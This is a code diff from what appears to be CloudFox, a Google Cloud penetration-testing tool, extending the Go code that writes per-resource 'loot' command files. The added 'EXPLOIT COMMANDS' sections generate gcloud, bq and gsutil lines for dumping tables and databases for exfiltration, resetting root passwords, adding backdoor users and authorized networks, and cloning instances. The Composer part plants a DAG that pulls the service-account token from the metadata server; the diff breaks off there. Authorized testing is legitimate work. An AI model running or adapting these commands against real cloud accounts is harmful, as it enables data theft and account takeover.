beyondcorpservice.AppConnectorInfo) { + lootFile := m.LootMap[projectID]["beyondcorp-details"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONNECTOR: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n", + connector.Name, connector.ProjectID, connector.Location, + connector.State, connector.PrincipalInfo) + + lootFile.Contents += fmt.Sprintf(` +# Describe this connector: +gcloud beta beyondcorp app connectors describe %s --location=%s --project=%s + +# Get IAM policy for this connector: +gcloud beta beyondcorp app connectors get-iam-policy %s --location=%s --project=%s + +`, connector.Name, connector.Location, connector.ProjectID, + connector.Name, connector.Location, connector.ProjectID) + + if connector.PublicAccess { + lootFile.Contents += "# [FINDING] This connector has PUBLIC access!\n\n" } - lootFile.Contents += "\n" } func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -309,7 +383,7 @@ func (m *BeyondCorpModule) writeHierarchicalOutput(ctx context.Context, logger i var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -351,7 +425,7 @@ func (m *BeyondCorpModule) writeFlatOutput(ctx context.Context, logger internal. var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index d0fbf896..d7b211a5 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -174,7 +174,11 @@ func (m *BigQueryModule) addDatasetToLoot(projectID string, dataset BigQueryServ // All commands for this dataset lootFile.Contents += fmt.Sprintf( - "## Dataset: %s (Project: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# DATASET: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Show dataset info\n"+ "bq show --project_id=%s %s\n"+ "bq show --format=prettyjson %s:%s\n\n"+ @@ -195,15 +199,21 @@ func (m *BigQueryModule) addTableToLoot(projectID string, table BigQueryService. // Table info and query commands lootFile.Contents += fmt.Sprintf( - "## Table: %s.%s (Project: %s)\n"+ - "# Type: %s, Size: %d bytes, Rows: %d\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# TABLE: %s.%s (Dataset: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Type: %s, Size: %d bytes, Rows: %d\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Show table schema:\n"+ - "bq show --schema --project_id=%s %s:%s.%s\n"+ + "bq show --schema --project_id=%s %s:%s.%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Query first 100 rows:\n"+ "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ "# Export table to GCS:\n"+ "bq extract --project_id=%s '%s:%s.%s' gs:///export_%s_%s.json\n\n", - table.DatasetID, table.TableID, table.ProjectID, + table.DatasetID, table.TableID, table.DatasetID, + table.ProjectID, table.TableType, table.NumBytes, table.NumRows, table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go index 7d9541ab..ae1df557 100644 --- a/gcp/commands/bigtable.go +++ b/gcp/commands/bigtable.go @@ -133,7 +133,7 @@ func (m *BigtableModule) processProject(ctx context.Context, projectID string, l m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["bigtable-commands"] = &internal.LootFile{ Name: "bigtable-commands", - Contents: "# Bigtable Commands\n# Generated by CloudFox\n\n", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -158,15 +158,62 @@ func (m *BigtableModule) addInstanceToLoot(projectID string, instance bigtablese } lootFile.Contents += fmt.Sprintf( - "# Instance: %s (%s)\n"+ + "# =============================================================================\n"+ + "# BIGTABLE INSTANCE: %s\n"+ + "# =============================================================================\n"+ + "# Display Name: %s\n"+ "# Type: %s, State: %s\n"+ - "# Clusters: %s\n"+ - "cbt -project %s -instance %s ls\n\n", + "# Clusters: %s\n", instance.Name, instance.DisplayName, instance.Type, instance.State, strings.Join(clusterNames, ", "), + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe instance: +gcloud bigtable instances describe %s --project=%s + +# List clusters in instance: +gcloud bigtable clusters list --instances=%s --project=%s + +# List tables (gcloud): +gcloud bigtable instances tables list --instances=%s --project=%s + +# List tables (cbt): +cbt -project %s -instance %s ls + +# Get instance IAM policy: +gcloud bigtable instances get-iam-policy %s --project=%s + +# List app profiles: +gcloud bigtable instances app-profiles list --instance=%s --project=%s + +# === EXPLOIT COMMANDS === + +# List all tables in the instance: +cbt -project %s -instance %s ls +# (See per-table commands below for specific read/lookup/dump commands) + +`, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.ProjectID, instance.Name, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, instance.ProjectID, instance.Name, ) + + // Add backup command with actual cluster name if available + if len(clusterNames) > 0 { + lootFile.Contents += fmt.Sprintf( + "# Create a backup (for exfiltration) - replace TABLE_NAME with actual table:\n"+ + "gcloud bigtable backups create cloudfox-backup --instance=%s --cluster=%s --table=TABLE_NAME --expiration-date=$(date -u -d '+7 days' '+%%Y-%%m-%%dT%%H:%%M:%%SZ') --project=%s --async\n\n", + instance.Name, clusterNames[0], instance.ProjectID, + ) + } } func (m *BigtableModule) addTableToLoot(projectID string, table bigtableservice.BigtableTableInfo) { @@ -175,10 +222,19 @@ func (m *BigtableModule) addTableToLoot(projectID string, table bigtableservice. return } lootFile.Contents += fmt.Sprintf( - "# Table: %s (Instance: %s)\n"+ - "cbt -project %s -instance %s read %s count=10\n\n", + "# -----------------------------------------------------------------------------\n"+ + "# TABLE: %s (Instance: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Read first 10 rows:\n"+ + "cbt -project %s -instance %s read %s count=10\n"+ + "# Get table IAM policy:\n"+ + "gcloud bigtable instances tables get-iam-policy %s --instance=%s --project=%s\n"+ + "# Describe table (column families):\n"+ + "cbt -project %s -instance %s ls %s\n\n", table.Name, table.InstanceName, table.ProjectID, table.InstanceName, table.Name, + table.Name, table.InstanceName, table.ProjectID, + table.ProjectID, table.InstanceName, table.Name, ) } @@ -317,7 +373,7 @@ func (m *BigtableModule) writeHierarchicalOutput(ctx context.Context, logger int var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -328,7 +384,10 @@ func (m *BigtableModule) writeHierarchicalOutput(ctx context.Context, logger int pathBuilder := m.BuildPathBuilder() - internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } } func (m *BigtableModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { @@ -356,7 +415,7 @@ func (m *BigtableModule) writeFlatOutput(ctx context.Context, logger internal.Lo var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -372,6 +431,9 @@ func (m *BigtableModule) writeFlatOutput(ctx context.Context, logger internal.Lo scopeNames[i] = m.GetProjectName(id) } - internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGTABLE_MODULE_NAME) + } } diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index bc8b80b9..bf490075 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -240,7 +240,20 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, m.mu.Lock() m.ProjectAllObjects[projectID] = projectObjects + // Group objects by bucket and add bucket-level headers + currentBucket := "" for _, obj := range projectObjects { + if obj.BucketName != currentBucket { + currentBucket = obj.BucketName + if lootFile := m.LootMap[projectID]["bucket-enum-all-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n\n", + currentBucket, + ) + } + } m.addObjectToLoot(projectID, obj) } m.mu.Unlock() @@ -260,7 +273,22 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, m.mu.Lock() m.ProjectSensitiveFiles[projectID] = projectFiles + // Group files by bucket and add bucket-level headers + currentBucket := "" for _, file := range projectFiles { + if file.BucketName != currentBucket { + currentBucket = file.BucketName + for _, lootName := range []string{"bucket-enum-commands", "bucket-enum-sensitive-commands"} { + if lootFile := m.LootMap[projectID][lootName]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n\n", + currentBucket, + ) + } + } + } m.addFileToLoot(projectID, file) } m.mu.Unlock() diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index bf674fa2..a702d969 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -196,7 +196,11 @@ func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageSer // All commands for this bucket lootFile.Contents += fmt.Sprintf( - "## Bucket: gs://%s (Project: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe bucket:\n"+ "gcloud storage buckets describe gs://%s --project=%s\n"+ "# Get IAM policy:\n"+ @@ -207,7 +211,8 @@ func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageSer "# List all objects recursively:\n"+ "gsutil ls -r gs://%s/**\n"+ "# Get bucket size:\n"+ - "gsutil du -s gs://%s/\n"+ + "gsutil du -s gs://%s/\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Download all contents (create directory first):\n"+ "mkdir -p bucket/%s/\n"+ "gsutil -m cp -r gs://%s/ bucket/%s/\n"+ diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index be2ddf0a..02ba4d49 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -148,7 +148,7 @@ func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["cloudbuild-details"] = &internal.LootFile{ Name: "cloudbuild-details", - Contents: "# Cloud Build Details\n# Generated by CloudFox\n\n", + Contents: "# Cloud Build Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -203,16 +203,24 @@ func (m *CloudBuildModule) addTriggerToLoot(projectID string, trigger cloudbuild } lootFile.Contents += fmt.Sprintf( - "# %s (%s)%s\n"+ - "Project: %s\n"+ - "Source: %s - %s\n"+ - "Branch/Tag: %s | Config: %s\n"+ - "Service Account: %s\n", - trigger.Name, trigger.ID, flagStr, + "# =============================================================================\n"+ + "# BUILD TRIGGER: %s%s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# ID: %s\n"+ + "# Source: %s - %s\n"+ + "# Branch/Tag: %s, Config: %s\n"+ + "# Service Account: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe trigger:\n"+ + "gcloud builds triggers describe %s --project=%s\n", + trigger.Name, flagStr, trigger.ProjectID, + trigger.ID, trigger.SourceType, trigger.RepoName, branchTag, trigger.Filename, sa, + trigger.ID, trigger.ProjectID, ) } @@ -224,9 +232,9 @@ func (m *CloudBuildModule) addSecurityAnalysisToLoot(projectID string, analysis // Add exploitation commands if available if len(analysis.ExploitCommands) > 0 { - lootFile.Contents += "Exploitation:\n" + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" for _, cmd := range analysis.ExploitCommands { - lootFile.Contents += fmt.Sprintf(" %s\n", cmd) + lootFile.Contents += fmt.Sprintf("# %s\n", cmd) } } lootFile.Contents += "\n" @@ -244,9 +252,11 @@ func (m *CloudBuildModule) addBuildToLoot(projectID string, build cloudbuildserv } lootFile.Contents += fmt.Sprintf( - "# Build: %s\n"+ - "Project: %s | Status: %s\n"+ - "Trigger: %s | Source: %s\n", + "# -----------------------------------------------------------------------------\n"+ + "# BUILD: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Status: %s\n"+ + "# Trigger: %s, Source: %s\n", buildID, build.ProjectID, build.Status, build.TriggerID, build.Source, @@ -436,7 +446,7 @@ func (m *CloudBuildModule) writeHierarchicalOutput(ctx context.Context, logger i var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -478,7 +488,7 @@ func (m *CloudBuildModule) writeFlatOutput(ctx context.Context, logger internal. var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 838dbe6f..2bca99ee 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -221,17 +221,22 @@ func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService. // All commands for this service commandsLoot.Contents += fmt.Sprintf( - "## Service: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n"+ + "# SERVICE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ "# Image: %s\n"+ "# Service Account: %s\n"+ "# Public: %v\n"+ "# URL: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe service:\n"+ "gcloud run services describe %s --region=%s --project=%s\n"+ "# Get IAM policy:\n"+ "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ "# List revisions:\n"+ - "gcloud run revisions list --service=%s --region=%s --project=%s\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Invoke the service (if you have run.routes.invoke):\n"+ "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n\n", svc.Name, svc.ProjectID, svc.Region, @@ -247,7 +252,10 @@ func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService. // Add secret references to loot if len(svc.SecretRefs) > 0 && secretRefsLoot != nil { - secretRefsLoot.Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + secretRefsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n", svc.Name, svc.ProjectID, svc.Region) for _, ref := range svc.SecretRefs { if ref.Type == "env" { secretRefsLoot.Contents += fmt.Sprintf( @@ -275,13 +283,18 @@ func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobI // All commands for this job commandsLoot.Contents += fmt.Sprintf( - "## Job: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n"+ + "# JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ "# Image: %s\n"+ "# Service Account: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe job:\n"+ "gcloud run jobs describe %s --region=%s --project=%s\n"+ "# List executions:\n"+ - "gcloud run jobs executions list --job=%s --region=%s --project=%s\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Execute the job (if you have run.jobs.run):\n"+ "gcloud run jobs execute %s --region=%s --project=%s\n\n", job.Name, job.ProjectID, job.Region, @@ -294,7 +307,10 @@ func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobI // Add secret references to loot if len(job.SecretRefs) > 0 && secretRefsLoot != nil { - secretRefsLoot.Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + secretRefsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# JOB: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n", job.Name, job.ProjectID, job.Region) for _, ref := range job.SecretRefs { if ref.Type == "env" { secretRefsLoot.Contents += fmt.Sprintf( diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index 7307f43a..0bb1dc58 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -162,7 +162,7 @@ func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, l m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["cloudsql-commands"] = &internal.LootFile{ Name: "cloudsql-commands", - Contents: "# Cloud SQL Details\n# Generated by CloudFox\n\n", + Contents: "# Cloud SQL Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -194,15 +194,20 @@ func (m *CloudSQLModule) addInstanceToLoot(projectID string, instance CloudSQLSe } lootFile.Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Project: %s | Region: %s\n"+ + "# =============================================================================\n"+ + "# CLOUD SQL: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Version: %s\n"+ "# Public IP: %s\n", - instance.Name, instance.DatabaseVersion, + instance.Name, instance.ProjectID, instance.Region, + instance.DatabaseVersion, publicIP, ) // gcloud commands + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( "gcloud sql instances describe %s --project=%s\n"+ "gcloud sql databases list --instance=%s --project=%s\n"+ @@ -249,6 +254,72 @@ func (m *CloudSQLModule) addInstanceToLoot(projectID string, instance CloudSQLSe ) } + // === EXPLOIT COMMANDS === + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + + // Password reset + lootFile.Contents += fmt.Sprintf( + "# Reset database user password (requires cloudsql.users.update):\n"+ + "gcloud sql users set-password root --host=%% --instance=%s --project=%s --password=NEW_PASSWORD\n"+ + "gcloud sql users set-password postgres --instance=%s --project=%s --password=NEW_PASSWORD\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Create new user + lootFile.Contents += fmt.Sprintf( + "# Create a new database user (requires cloudsql.users.create):\n"+ + "gcloud sql users create cloudfox_user --instance=%s --project=%s --password=GENERATED_PASSWORD\n\n", + instance.Name, instance.ProjectID, + ) + + // Backup exfiltration + lootFile.Contents += fmt.Sprintf( + "# List existing backups:\n"+ + "gcloud sql backups list --instance=%s --project=%s\n\n"+ + "# Create a new backup (for exfiltration):\n"+ + "gcloud sql backups create --instance=%s --project=%s\n\n"+ + "# Export database to GCS bucket (data exfiltration):\n"+ + "gcloud sql export sql %s gs://BUCKET_NAME/export-%s.sql --database=DATABASE_NAME --project=%s\n"+ + "gcloud sql export csv %s gs://BUCKET_NAME/export-%s.csv --database=DATABASE_NAME --query=\"SELECT * FROM TABLE_NAME\" --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + ) + + // Clone instance + lootFile.Contents += fmt.Sprintf( + "# Clone instance to attacker-controlled project (requires cloudsql.instances.clone):\n"+ + "gcloud sql instances clone %s %s-clone --project=%s\n\n", + instance.Name, instance.Name, instance.ProjectID, + ) + + // IAM authentication exploitation + if instance.IAMAuthentication { + lootFile.Contents += fmt.Sprintf( + "# IAM database authentication is enabled - connect using SA token:\n"+ + "gcloud sql generate-login-token | %s\n\n", + func() string { + switch dbType { + case "mysql": + return fmt.Sprintf("mysql -h %s -u SA_EMAIL --enable-cleartext-plugin --password=$(cat -)", connectionInstance) + case "postgres": + return fmt.Sprintf("PGPASSWORD=$(cat -) psql -h %s -U SA_EMAIL", connectionInstance) + default: + return "# Use the token as password for database connection" + } + }(), + ) + } + + // Authorized network manipulation + lootFile.Contents += fmt.Sprintf( + "# Add your IP to authorized networks (requires cloudsql.instances.update):\n"+ + "gcloud sql instances patch %s --project=%s --authorized-networks=YOUR_IP/32\n\n", + instance.Name, instance.ProjectID, + ) + // Surface security issues if any were detected if len(instance.SecurityIssues) > 0 { lootFile.Contents += "# Security Issues:\n" @@ -309,7 +380,7 @@ func (m *CloudSQLModule) writeHierarchicalOutput(ctx context.Context, logger int var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -346,7 +417,7 @@ func (m *CloudSQLModule) writeFlatOutput(ctx context.Context, logger internal.Lo var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go index 6991b6ab..e081ed08 100644 --- a/gcp/commands/compliancedashboard.go +++ b/gcp/commands/compliancedashboard.go @@ -1581,19 +1581,19 @@ func (m *ComplianceDashboardModule) getProjectFromResource(resource string) stri func (m *ComplianceDashboardModule) initializeLootFiles() { m.LootMap["compliance-critical-failures"] = &internal.LootFile{ Name: "compliance-critical-failures", - Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# These require immediate remediation!\n\n", + Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["compliance-remediation-commands"] = &internal.LootFile{ Name: "compliance-remediation-commands", - Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n\n", + Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["compliance-by-framework"] = &internal.LootFile{ Name: "compliance-by-framework", - Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n\n", + Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["compliance-failed-controls"] = &internal.LootFile{ Name: "compliance-failed-controls", - Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n\n", + Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -1604,12 +1604,14 @@ func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) // Critical failures if failure.Severity == "CRITICAL" { m.LootMap["compliance-critical-failures"].Contents += fmt.Sprintf( - "## %s - %s\n"+ - "Framework: %s\n"+ - "Resource: %s\n"+ - "Project: %s\n"+ - "Risk Score: %d\n"+ - "Remediation: %s\n\n", + "# =============================================================================\n"+ + "# %s - %s\n"+ + "# =============================================================================\n"+ + "# Framework: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n"+ + "# Risk Score: %d\n"+ + "# Remediation: %s\n\n", failure.ControlID, failure.ControlName, failure.Framework, @@ -1798,7 +1800,7 @@ func (m *ComplianceDashboardModule) collectLootFiles() []internal.LootFile { // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index a56777e4..39bb7979 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -118,7 +118,7 @@ func (m *ComposerModule) processProject(ctx context.Context, projectID string, l m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["composer-commands"] = &internal.LootFile{ Name: "composer-commands", - Contents: "# Composer Commands\n# Generated by CloudFox\n\n", + Contents: "# Composer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -134,32 +134,118 @@ func (m *ComposerModule) addToLoot(projectID string, env composerservice.Environ return } lootFile.Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Project: %s\n", - env.Name, env.Location, - env.ProjectID, + "# =============================================================================\n"+ + "# COMPOSER ENVIRONMENT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Private: %s\n", + env.Name, env.ProjectID, env.Location, + env.State, env.ServiceAccount, + shared.BoolToYesNo(env.PrivateEnvironment), ) - // gcloud commands - lootFile.Contents += fmt.Sprintf( - "gcloud composer environments describe %s --location=%s --project=%s\n"+ - "gcloud composer environments run %s --location=%s --project=%s dags list\n", + // === ENUMERATION COMMANDS === + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe environment: +gcloud composer environments describe %s --location=%s --project=%s + +# List DAGs: +gcloud composer environments run %s --location=%s --project=%s dags list + +# List Airflow connections (may contain credentials): +gcloud composer environments run %s --location=%s --project=%s connections list + +# List Airflow variables (may contain secrets): +gcloud composer environments run %s --location=%s --project=%s variables list + +# List Airflow pools: +gcloud composer environments run %s --location=%s --project=%s pools list + +# Show environment configuration: +gcloud composer environments describe %s --location=%s --project=%s --format=json | jq '.config' + +`, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, env.Name, env.Location, env.ProjectID, env.Name, env.Location, env.ProjectID, ) - // DAG bucket command + // === DAG BUCKET COMMANDS === + if env.DagGcsPrefix != "" { + lootFile.Contents += fmt.Sprintf( + "# === DAG BUCKET COMMANDS ===\n\n"+ + "# List DAG files:\n"+ + "gsutil ls %s\n\n"+ + "# Download all DAGs for analysis:\n"+ + "gsutil -m cp -r %s /tmp/composer-dags-%s/\n\n"+ + "# Search DAGs for hardcoded credentials:\n"+ + "gsutil cat %s/*.py | grep -iE '(password|secret|token|key|credential)'\n\n", + env.DagGcsPrefix, + env.DagGcsPrefix, env.Name, + env.DagGcsPrefix, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // DAG upload for code execution (CRITICAL attack vector) if env.DagGcsPrefix != "" { lootFile.Contents += fmt.Sprintf( - "gsutil ls %s\n", + "# Upload malicious DAG for code execution (runs as Composer SA: %s):\n"+ + "# Create a reverse shell DAG or credential harvester:\n"+ + "cat > /tmp/cloudfox_dag.py << 'DAGEOF'\n"+ + "from airflow import DAG\n"+ + "from airflow.operators.python import PythonOperator\n"+ + "from datetime import datetime\n"+ + "import subprocess, json\n"+ + "def exfil_metadata():\n"+ + " # Get SA token from metadata\n"+ + " result = subprocess.run(['curl', '-s', '-H', 'Metadata-Flavor: Google',\n"+ + " 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'],\n"+ + " capture_output=True, text=True)\n"+ + " print(json.loads(result.stdout))\n"+ + "dag = DAG('cloudfox_test', start_date=datetime(2024,1,1), schedule_interval=None)\n"+ + "task = PythonOperator(task_id='test', python_callable=exfil_metadata, dag=dag)\n"+ + "DAGEOF\n"+ + "gsutil cp /tmp/cloudfox_dag.py %s/cloudfox_dag.py\n\n"+ + "# Trigger the uploaded DAG:\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags trigger cloudfox_test\n\n"+ + "# Check DAG run status:\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags list-runs 